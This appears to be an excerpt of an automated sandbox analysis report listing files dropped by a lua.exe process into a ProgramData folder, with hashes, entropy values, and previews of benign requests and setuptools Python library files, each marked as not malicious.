SHA-512:	A5542B081646281EDF24F4A9FED178E8F6D41F444E37B23A7BFF24D0EB3CAD775B0B8210C0C0DA6F3B5907BD8EC0194B60750C3CD7F16E723A2A3FFA01C57BF2
Malicious:	false
Preview:	# -- coding: utf-8 --..r""".The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay`` all correspond to the HTTP status code 200.."""..from .structures import LookupDict.._codes = {.. # Informational.. 100: ('continue',),. 101: ('switching_protocols',),. 102: ('processing',),. 103: ('checkpoint',),. 122: ('uri_too_long', 'request_uri_too_long'),. 200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '.'),. 201: ('created',),. 202: ('accepted',),. 203: ('non_authoritative_info', 'non_authoritative_information'),. 204: ('no_cont

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\structures.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3005
Entropy (8bit):	4.663177496687511
Encrypted:	false
SSDEEP:	48:qtJ0fhf5XObXK0YuIG9n6QeHMl5uWG5gRMzcvMvfDjmTXr2LpC5pSjFjz5rm:UJgabXX+HaIWqk4fGg0LEFjtm
MD5:	6704E7E48FFBA962D36E10E836B45AC3
SHA1:	3E31D604B50343323017933A6E3D7D9C410A041D
SHA-256:	9AC02DAFD9AAD49C4777E251CA220B7DD165A5B270BEF16E3F7ADF5104FF4311
SHA-512:	5E5BB815F50C811ABEAB23EB89406992B4DDC6C9C4B900B31B725C96D69DD0FD8A54517B295A22F2208C2F71FC0EAB1096247DE1FA1B7063006177BE9807FE9F
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.."""..from collections import OrderedDict..from .compat import Mapping, MutableMapping...class CaseInsensitiveDict(MutableMapping):. """A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json' # True. list(cid) == ['Accept'] # True.. For example, ``headers['content-encoding']`` will return the. value of a ``'Content-Encoding'`` response

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	30529
Entropy (8bit):	4.621242888961286
Encrypted:	false
SSDEEP:	768:BgGuJADV/dSl1V4Z/aQuXZeOGio5f2PcU3vGYvBS:BgGIADV/W1YaTEOGi8f2PcSesBS
MD5:	0599B4790FA7D41B664F2EE6796CBCE9
SHA1:	F7DD826F6F0F6D56E4B8A74C7FAFDF9BC7C0C19D
SHA-256:	FCAF4082437A79F3DEF9AFB3819BAB5F376CE4F042D02CC39328C0136A024054
SHA-512:	2F5A6A526FA04763CE30ED2CAFE4E0871C2B1C61C677D893CAFADB203BCC87D549413721675836200F214260A831D024D337C2CACF5DE091EC14BBB5046D7CB3
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.."""..import codecs.import contextlib.import io.import os.import re.import socket.import struct.import sys.import tempfile.import warnings.import zipfile.from collections import OrderedDict..from .__version__ import __version__.from . import certs.# to_native_string is unused here, but imported here for backwards compatibility.from ._internal_utils import to_native_string.from .compat import parse_http_list as _parse_list_header.from .compat import (. quote, urlparse, bytes, str, unquote, getproxies,. proxy_bypass, urlunparse, basestring, integer_types, is_py3,. proxy_bypass_environment, getproxies_environment, Mapping).from .cookies import cookiejar_from_dict.from .structures import CaseInsensitiveDict.from .exceptions import (. InvalidURL, InvalidHeader, FileModeWarning, UnrewindableBodyError)..NETRC

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	5.127816565309219
Encrypted:	false
SSDEEP:	24:p7rOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:RSJrlxEvdQHOs5exm3ogFh
MD5:	9A33897F1BCA1160D7AAD3835152E158
SHA1:	A5234543D56E03C950C0080826B53A0CB97671AF
SHA-256:	C32A3AC395AF6321EFD28BE73D06A00F0DB6AB887D1C21D4FEC46128D2056D5A
SHA-512:	0CC71D2F794775FE676B729532C1B5B68777CABC7FB15E0D5F38542A3D4631B211074FF86D69127E2F088CD357161CF0C353F658F640711CDCC821D4D45CB318
Malicious:	false
Preview:	Copyright (C) 2016 Jason R Coombs <jaraco@jaraco.com>..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	5.080474990368507
Encrypted:	false
SSDEEP:	96:Dp1UYyJAmhQI/aMmPkU139n71ACA8IWqyU8cEcpDiHVP6o7PFPMUwTeXv:bFZNn7mZ8IWqyU8ct4wTY
MD5:	46D318438327D0E4CB0F227DF1B70E3A
SHA1:	931239D7D58B16CCECB5444FF421F700E3F60252
SHA-256:	C709FFF7C3824FB2110DF2E2FA9FEF720D0CE413E763724BC36F979A6A97FC6C
SHA-512:	040FBDA4CFF9158FFB9015714C2E7BFA899C97CD95F4F6FF668EE0C77E34D570694B88AF549294FA60AA086FD852EC1E9EF15407594217FE8364DFA6F538148D
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: setuptools.Version: 51.0.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.License: UNKNOWN.Project-URL: Documentation, https://setuptools.readthedocs.io/.Keywords: CPAN PyPI distutils eggs package management.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23142
Entropy (8bit):	5.595409213095854
Encrypted:	false
SSDEEP:	384:s2wTz5O0SogahtYF+enmP+Ost4gcWmdcYchXJ3ejwnSUx5U3yvjhL+Xx9Lm:0Px+kUSUxuivjp+x9Lm
MD5:	A5FC1ABF5761F78A11A9B43063CC1E41
SHA1:	F60D6E4EB293B170C0E6BB513CD703693F3F7174
SHA-256:	7BA8B73BC2EFF4B7FE969D6EB1D51CD9906C641884E7A20F85569F82029D5540
SHA-512:	0CA494857D806396B36430616439D5FF90B5823D3001A4BF9E319331ED241B86D3FC70B55B360CA67F432165DDE26D9866145968BC76CB20F2FACC11794935B8
Malicious:	false
Preview:	../../Scripts/easy_install-3.7.exe,sha256=YTVqnr6uQxPh7MCPR-HgJHEK28WRGgzqIGHl4iGTC8k,97139..../../Scripts/easy_install.exe,sha256=YTVqnr6uQxPh7MCPR-HgJHEK28WRGgzqIGHl4iGTC8k,97139..__pycache__/easy_install.cpython-37.pyc,,.._distutils_hack/__init__.py,sha256=wFuARcmlHtkV20HfRBlQaMPY7hQx-TEEtnBpXeysiwI,3552.._distutils_hack/__pycache__/__init__.cpython-37.pyc,,.._distutils_hack/__pycache__/override.cpython-37.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=fqf_7z_ioRfuEsaO1lU2F_DX_S8FkCV8JcSElZo7c3M,152..easy_install.py,sha256=MDC9vt5AxDsXX5qcKlBz2TnW6Tpuv_AobnfhCJ9X3PM,126..pkg_resources/__init__.py,sha256=LERWHHiTbaylvENu2lku0M4zrzZBwFrnf2dbEFzFdvc,107946..pkg_resources/__pycache__/__init__.cpython-37.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-37.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-37.pyc,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.820827594031884
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCfA5S:RtBMwlViGjWBBf
MD5:	5CCC7519EB42F1DFCEEE6E7D685F1FF5
SHA1:	DDD91BC89B15FC5C66E0FA259392955C74BA041F
SHA-256:	11546323AF45E6A5639BF620A9C4D73E74C0BF705F494AF4595007B923F75E8A
SHA-512:	2972A0FBFA2EC199E9510AA810852F0693810F89781872D20203B296DC42037D7E2D68DDBEDE3A77EDB51DBD17CCB764347D533E43103ED287D76392F3F8EE2A
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\dependency_links.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	239
Entropy (8bit):	4.9593491706048285
Encrypted:	false
SSDEEP:	6:2MqdSOGVKfetEX8sEuGLRxtqdSOGR74pN6Dzqv:2qbcmEdEuudXUpN6DzU
MD5:	6E8EDE13DB59FBC370572CA72D66E36C
SHA1:	A0BE976BB2269ECB935661972C427CDD70BDCA1E
SHA-256:	1E5902164A0AE536D9E4430B6CB29884B718FC4DF5901583F13A96D848266AD4
SHA-512:	153439FE69A27A5FCEA82162B42FEA5BD88A469B1A853E5FC9DFBF8B6F64CD90B3900DC5683593F1DC97553DAEF4D42857E9437CC4BF05E95C3117619B4BCEB1
Malicious:	false
Preview:	https://files.pythonhosted.org/packages/source/c/certifi/certifi-2016.9.26.tar.gz#md5=baa81e951a29958563689d868ef1064d.https://files.pythonhosted.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\entry_points.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3143
Entropy (8bit):	4.536591833837899
Encrypted:	false
SSDEEP:	48:R/YG8BZvy3g6yj+DsmnA540rZh2Phv4hhpTSeTonTj:qG8jPAorZoP94hTTSecTj
MD5:	B7EFFC5DA69B35D6794BA145EC0FE238
SHA1:	BCB0BA6F1E37C84D8616760EA8B555F6DE37CB5B
SHA-256:	D4AE45AF4FB93E1DD945916EC0D6B0F0444688D2D5A87BDD28336DDE85C64BAC
SHA-512:	8DF58FF4BD178241EBFFF00A6135FF1701D85D0FACC18B747E763B9BBE0CCCD2E6D19F067866B2D802693B53DCF9BE9935481E179886D264750FA6693A7C7C66
Malicious:	false
Preview:	[console_scripts].easy_install = setuptools.command.easy_install:main.easy_install-3.8 = setuptools.command.easy_install:main..[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.bdist_wininst = setuptools.command.bdist_wininst:bdist_wininst.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveop

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.0024950858099375
Encrypted:	false
SSDEEP:	3:3Wd+YUnLWghk5QfQYv:3Wd+pWgPv
MD5:	9D6C9EB410F58BDCE1DA32D9E98FA6CD
SHA1:	7D25E7E8A4D3E400681E4302F23C72A50F08A64A
SHA-256:	5DCE3BFBF6E7F485DAD05DA53FA744FA5FB249EE579AFFE2848597F9A5230208
SHA-512:	40DB60C7854ECFC8B57F2CA19D3D41C729C21AABC7108DD22677134CE71C511EA00A4E73E925E61DEA110BBF8B49312340C0CA92803C92B669ED134BC8E349DD
Malicious:	false
Preview:	_distutils_hack.easy_install.pkg_resources.setuptools.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools-51.0.0.dist-info\zip-safe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:v:v
MD5:	68B329DA9893E34099C7D8AD5CB9C940
SHA1:	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
SHA-256:	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
SHA-512:	BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
Malicious:	false
Preview:	.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7681
Entropy (8bit):	4.510158826701817
Encrypted:	false
SSDEEP:	96:8m+vWupu2rpjyIKV7Eqgve+rE/k5DvAPIY7+L1yD2b7pGtewA3JIXwpT3HJCQAe+:8bdDuq3D4PIY6yDQwA3JdjJCQv9h6
MD5:	A3B5B7BB7FE89FC5BD4B29DE218AB27B
SHA1:	B2C22E4FAAED0D33AEAC4A6ED34AE59031D537EE
SHA-256:	D1CDB7D8B47238B19D2FE6309A093CB8CB9BC7B236D70FA2C495A24F48D02BE7
SHA-512:	2E77B215F018084A8FC344F90DB5C95570002E6A944E095A58028FDD9B263EF543E85F0A769EF884C84C14F39F7357FF4695460CFCCCDEF3F3064E0AAE5B8F8F
Malicious:	false
Preview:	"""Extensions to the 'distutils' for large or complex distributions"""..from fnmatch import fnmatchcase.import functools.import os.import re..import _distutils_hack.override # noqa: F401..import distutils.core.from distutils.errors import DistutilsOptionError.from distutils.util import convert_path..from ._deprecation_warning import SetuptoolsDeprecationWarning..import setuptools.version.from setuptools.extension import Extension.from setuptools.dist import Distribution.from setuptools.depends import Require.from . import monkey...__all__ = [. 'setup', 'Distribution', 'Command', 'Extension', 'Require',. 'SetuptoolsDeprecationWarning',. 'find_packages', 'find_namespace_packages',.]..__version__ = setuptools.version.__version__..bootstrap_install_from = None..# If we run 2to3 on .py files, should we also convert docstrings?.# Default: yes; assume that we can detect doctests reliably.run_2to3_on_doctests = True.# Standard package names for fixer packages.lib2to3_fixer_packages =

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_deprecation_warning.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	218
Entropy (8bit):	4.402159787480587
Encrypted:	false
SSDEEP:	3:yWBJKYzG+LM2BbM2elFHvNdEY9s4xi2xFwlY/3NFxeo5LK0zBJJul8G+LM2FFJ00:yqkBl+Ws4EI4aBTatxXaFNFFiliN/
MD5:	00EB5CA8137E4D5569787DC4B577E570
SHA1:	9F554FF229A777B55816E0B8B39070EFBE8DF585
SHA-256:	8D4F7E76D7EFE9C2A6B5024E5CDF273F59A6EE038DC3990A12D88FB5BC276722
SHA-512:	3A030BF00596B4BE36E4FC375BBFCC5B0A93C6A0855557DE87CCC155A26E19F7F5DCEAA638B5A24A087AD5E5DA64258C6F8944950A0C7BF3B47E23F478E0A168
Malicious:	false
Preview:	class SetuptoolsDeprecationWarning(Warning):. """. Base class for warning deprecations in ``setuptools``.. This class is not derived from ``DeprecationWarning``, and as such is. visible by default.. """.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.631863978744436
Encrypted:	false
SSDEEP:	6:Hm7WIFtLJEZF1RO+W3N+sMcQh8ng1OcHy8yVViMIs1:HmqIFDE5RaTMdhb1OcHyjVViU1
MD5:	97AE7F32D108DC54533AEF4AD010E929
SHA1:	62DCEEAB3349B01B7204476292C6B24AF2DAF007
SHA-256:	969400A6147FEEE8560B67DB484A6CE096BD5B86307B337F217FCB244B779215
SHA-512:	486D054891B146EB61C77323AFAD47A84A3D1299ED981635F4D3D4CB0923DE32B9D7EC672997A04C2F9A0D8722EA9DBCD702A569075CF235643DBE91975C0925
Malicious:	false
Preview:	"""distutils..The main package for the Python Module Distribution Utilities. Normally.used from a setup script as.. from distutils.core import setup.. setup (...)."""..import sys..__version__ = sys.version[:sys.version.index(' ')]..local = True.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\_msvccompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20813
Entropy (8bit):	4.5141210863759
Encrypted:	false
SSDEEP:	384:0XGbeL4TafyhU7tuIKDGtZfTHE5cLE/9VONxaxc:g6ewSYabpEiT
MD5:	0746642D4D2AA5AC5E5CAA6158E17651
SHA1:	09AE306C2F5DB01E10F80B4742EF0DE59608E9C2
SHA-256:	2507077B3E74500DC140A2BD7CE280348FC6CCD171DFFAA765DC87C873408210
SHA-512:	9D043EB85C8093031EC94729FECC19F2BA9E3CEA1D5D941495DB0DD1C6D1BAE1669E105D3D68BF7620D3F3267218FA193C915B8C7881038F44C5F620377E993D
Malicious:	false
Preview:	"""distutils._msvccompiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for Microsoft Visual Studio 2015...The module is compatible with VS 2015 and later. You can find legacy support.for older versions in distutils.msvc9compiler and distutils.msvccompiler.."""..# Written by Perry Stoll.# hacked by Robin Becker and Thomas Heller to do a better job of.# finding DevStudio (through the registry).# ported to VS 2005 and VS 2008 by Christian Heimes.# ported to VS 2015 by Steve Dower..import os.import subprocess.import contextlib.import warnings.import unittest.mock.with contextlib.suppress(ImportError):. import winreg..from distutils.errors import DistutilsExecError, DistutilsPlatformError, \. CompileError, LibError, LinkError.from distutils.ccompiler import CCompiler, gen_lib_options.from distutils import log.from distutils.util import get_platform..from itertools import count..def _find_vc2015():. try:. key = winreg.O

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\archive_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8572
Entropy (8bit):	4.496971321669933
Encrypted:	false
SSDEEP:	192:qct4VgTdImDrwpIOwP3e6Gj6cFsMXUJTswqzWTuzQXh:d4kPDSI5PxGjTF7+Tswql8x
MD5:	9978FC55545736721F0CDD43EEED54E5
SHA1:	F53D27F3A87FD977B0D4C36FFB1BCC54F9623DED
SHA-256:	A96FAE886C187B14EF2B97BE8927A5FF7D43B21C7E0AA4DA9CD3CAEAC9F07FDF
SHA-512:	BF61E18300DE09C9EA570DDED495E3F3DD1399FC0DC68B071A7E545F3A5C77032C95BC35EB0D7C203B7C75224821F4F09E4E7817AA33283EC418448C8F4CF708
Malicious:	false
Preview:	"""distutils.archive_util..Utility functions for creating archive files (tarballs, zip files,.that sort of thing)."""..import os.from warnings import warn.import sys..try:. import zipfile.except ImportError:. zipfile = None...from distutils.errors import DistutilsExecError.from distutils.spawn import spawn.from distutils.dir_util import mkpath.from distutils import log..try:. from pwd import getpwnam.except ImportError:. getpwnam = None..try:. from grp import getgrnam.except ImportError:. getgrnam = None..def _get_gid(name):. """Returns a gid, given a group name.""". if getgrnam is None or name is None:. return None. try:. result = getgrnam(name). except KeyError:. result = None. if result is not None:. return result[2]. return None..def _get_uid(name):. """Returns an uid, given a user name.""". if getpwnam is None or name is None:. return None. try:. result = getpwnam(name). except KeyError:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\bcppcompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14894
Entropy (8bit):	4.242978232605063
Encrypted:	false
SSDEEP:	192:0CxM2nT6f1P9AfICo9Foz/M2SxNs2pNOdvfFdsKnp:7M2K1jCoPozWaBF2Knp
MD5:	A80FBF67FC165A7CEAF651E75EE4A2CB
SHA1:	DA29DA11BB7C906828F2A9E0E5492923742C0B78
SHA-256:	3890D5A425265FA1FCBFFEE5575CE27D5D5F731F760ABD9D862521EBDF3D5092
SHA-512:	AD17E9B64E7E0BD4A7FC46864007F89A48DF08914997A93A46F9DFCEABA7A5975B1E56360328DB90E65B06C620BC285024D222700A2A7A874E33C57554CC038C
Malicious:	false
Preview:	"""distutils.bcppcompiler..Contains BorlandCCompiler, an implementation of the abstract CCompiler class.for the Borland C++ compiler.."""..# This implementation by Lyle Johnson, based on the original msvccompiler.py.# module and using the directions originally published by Gordon Williams...# XXX looks like there's a LOT of overlap between these two classes:.# someone should sit down and factor out the common code as.# WindowsCCompiler! --GPW...import os.from distutils.errors import \. DistutilsExecError, \. CompileError, LibError, LinkError, UnknownFileError.from distutils.ccompiler import \. CCompiler, gen_preprocess_options.from distutils.file_util import write_file.from distutils.dep_util import newer.from distutils import log..class BCPPCompiler(CCompiler) :. """Concrete class that implements an interface to the Borland C/C++. compiler, as defined by the CCompiler abstract class.. """.. compiler_type = 'bcpp'.. # Just set this so CCompiler's constructor

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\ccompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	47437
Entropy (8bit):	4.368504848524346
Encrypted:	false
SSDEEP:	768:Sg1gC+MsvR2CtZxS/3BjyVdaIO/+OGMJ/p:SRNGy3aIJ9M/
MD5:	5C94126F8BECD015990AE933E2C3E001
SHA1:	B864B3A0E8F4A053A725FB14C9E9D3E8380D884C
SHA-256:	E1CA9082AD3A35B1A8D2F6B318C4F668F67A2B667E1DCB919FD3DFCFF6D050FC
SHA-512:	AA5FBA7ECC7A233A88E89F990EBE5646F4F8F1D2DD4DD6F04CAC600DEA88C63BA183B661065C658C76273E8DBC4B4E71A5FD8894A7BB84672F33ED08D8CF2306
Malicious:	false
Preview:	"""distutils.ccompiler..Contains CCompiler, an abstract base class that defines the interface.for the Distutils compiler abstraction model."""..import sys, os, re.from distutils.errors import *.from distutils.spawn import spawn.from distutils.file_util import move_file.from distutils.dir_util import mkpath.from distutils.dep_util import newer_group.from distutils.util import split_quoted, execute.from distutils import log..class CCompiler:. """Abstract base class to define the interface that must be implemented. by real compiler classes. Also has some utility methods used by. several compiler classes... The basic idea behind a compiler abstraction class is that each. instance can be used for all the compile/link steps in building a. single project. Thus, attributes common to all of those compile and. link steps -- include directories, macros to define, libraries to link. against, etc. -- are attributes of the compiler instance. To allow for. variability in

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\cmd.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18079
Entropy (8bit):	4.363758906898827
Encrypted:	false
SSDEEP:	384:WpFq779PxAftIyBkWHkjgUBkIr6dosLc7lO3HGbLKXnJ:WGHvkDZyHXRRROUAnJ
MD5:	7A2AEF02AA8EFEE013F6D549D8883496
SHA1:	B70CF256FD895B9E953D6CC983036ED0D771F0D3
SHA-256:	79CA3A2C0194B686CBB8F69FBA19A02A09304512FF598F0A27861E0C21E9725B
SHA-512:	954CA5F270EE9758B31E60A3BA979543CF42F26C5B99D9F068131927CD0A0D830708E89EBE12F73FF071416FBFE8403777DDEF00E76A6F5AE6C5985C491EAFD5
Malicious:	false
Preview:	"""distutils.cmd..Provides the Command class, the base class for the command classes.in the distutils.command package.."""..import sys, os, re.from distutils.errors import DistutilsOptionError.from distutils import util, dir_util, file_util, archive_util, dep_util.from distutils import log..class Command:. """Abstract base class for defining command classes, the "worker bees". of the Distutils. A useful analogy for command classes is to think of. them as subroutines with local variables called "options". The options. are "declared" in 'initialize_options()' and "defined" (given their. final values, aka "finalized") in 'finalize_options()', both of which. must be defined by every command class. The distinction between the. two is necessary because option values might come from the outside. world (command line, config file, ...), and any options dependent on. other options must be computed after these outside influences have. been processed -- hence 'fi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	799
Entropy (8bit):	3.7840667205167846
Encrypted:	false
SSDEEP:	24:HMeCD8RbaiF/addSFtdK7eylA1HQkoVB6:seCNiNaddSDyWVQkoVB6
MD5:	7C981CE80DF18B24019A3A5635BA92DD
SHA1:	8DCCEB3A590954C7D6AC051B1E88F9AAA045E80F
SHA-256:	D9303EAE5343973788F9CB1B5875C58C60FCB8E62A00B31FC963A14F8F670BA8
SHA-512:	EF1A854578ABE7697E27EA0287BB7FC7BB56C9A18FFAD8A3AEBB60EC879DC3F08CA519A3D3AB5F3D63CEA3E6A426095AA1A29D671536FA4F67B111EA23189B12
Malicious:	false
Preview:	"""distutils.command..Package containing implementation of all the standard Distutils.commands."""..__all__ = ['build',. 'build_py',. 'build_ext',. 'build_clib',. 'build_scripts',. 'clean',. 'install',. 'install_lib',. 'install_headers',. 'install_scripts',. 'install_data',. 'sdist',. 'register',. 'bdist',. 'bdist_dumb',. 'bdist_rpm',. 'bdist_wininst',. 'check',. 'upload',. # These two are reserved for future use:. #'bdist_sdux',. #'bdist_pkgtool',. # Note:. # bdist_packager is not included because it only provides. # an abstract base class. ].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\bdist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5562
Entropy (8bit):	4.240369903006785
Encrypted:	false
SSDEEP:	96:FMfrm1xJm1bKL4IGbnUo/tNxK4hoCCK4BrgOMaN7/17S3oTYW/7OQAJ3Gw/GgDA1:FMfa1xJm1+kIUntc4hoCqgOzNxtn7OQT
MD5:	2AF1405F81A3873B0DE48250DC9C50FE
SHA1:	9827874F4AB3843E00F8FF6C5BB47EE5A0A16CB6
SHA-256:	DB3E1EB9D465FE7EE6DE51BD95E2F4218A9EB386EC9BC7347F17D9BA269F8CC8
SHA-512:	D70BD4E8585CBC4A2EE6E5082591CA80C9DB583B4818B9F2BB9E5584F24548CEB180E60144A730352D16F7928A55C864905082A49D274A3F02A8D41DD89CDF49
Malicious:	false
